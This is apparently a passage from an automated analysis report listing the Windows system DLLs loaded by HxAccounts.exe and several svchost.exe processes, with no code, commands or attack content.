                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: coreuicomponents.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: ntmarta.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: onecoreuapcommonproxystub.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: uxtheme.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: urlmon.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: srvcli.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: netutils.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: dxgi.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: resourcepolicyclient.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: office.ui.xaml.hxaccounts.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: d3d11.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: windows.storage.applicationdata.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: d3d10warp.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: dxcore.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: d2d1.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: hxcomm.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: cryptsp.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: dwrite.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: windows.applicationmodel.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: textshaping.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: windows.globalization.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: bcp47mrm.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: onecorecommonproxystub.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: profapi.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: windows.networking.connectivity.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: windows.networking.hostname.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: windows.energy.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: rmclient.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: windows.storage.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: wldp.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: rometadata.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: windows.system.diagnostics.telemetry.platformtelemetryclient.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: mrmcorer.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: windows.staterepositoryclient.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: windows.shell.servicehostbuilder.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: execmodelproxy.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: uiamanager.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: windows.ui.core.textinput.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: windows.ui.immersive.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: dataexchange.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: cryptbase.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: windows.accountscontrol.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: xmllite.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: windows.security.authentication.web.core.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: vaultcli.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: windows.ui.xaml.controls.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: userenv.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: profext.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: directmanipulation.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: winrttracing.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: hxoutlook.resources.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: msftedit.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: globinputhost.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: windowscodecs.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: windows.graphics.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: wuceffects.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: threadpoolwinrt.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: wlidsvc.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: clipc.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msxml6.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: wtsapi32.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: winsta.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: gamestreamingext.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msauserext.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: tbs.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: cryptngc.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: devobj.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: webio.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: cryptnet.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: elscore.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: elstrans.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: esent.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: mi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: webio.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: es.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: bthavctpsvc.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: wpprecorderum.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: onecoreuapcommonproxystub.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: unistore.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: esent.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: userdataplatformhelperutil.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: userdataservice.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: systemeventsbrokerclient.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: pimstore.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: phoneutil.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: messagingdatamodel2.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: pimindexmaintenanceclient.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: pimstore.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: pimstore.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: cemapi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: userdatatypehelperutil.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: aphostservice.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: networkhelper.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: syncutil.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: mccspal.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: vaultcli.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: dmcfgutils.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: wintypes.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: dmcmnutils.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: dmxmlhelputils.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: inproclogger.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: pimindexmaintenance.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: windows.networking.connectivity.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: capabilityaccessmanagerclient.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: posyncservices.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: synccontroller.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: aphostclient.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: accountaccessor.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: dsclient.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: userdatalanguageutil.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: mccsengineshared.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: winsync.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: appxalluserstore.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: windows.staterepositoryps.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: moshost.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: mapsbtsvc.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: mosstorage.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: ztrace_maps.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: ztrace_maps.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: bcp47langs.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: mapconfiguration.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: storsvc.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: devobj.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: fltlib.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: bcd.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: wer.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: cabinet.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: storageusage.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: lfsvc.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: locationframework.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: brokerlib.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: locationframeworkps.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: wtsapi32.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: winsta.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: bi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: capabilityaccessmanagerclient.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: locationwinpalmisc.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: devobj.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: portabledevicetypes.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: mdmcommon.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: ngcsvc.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: authz.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: devobj.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: wtsapi32.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: winsta.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: tbs.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: ngcctnrsvc.dll
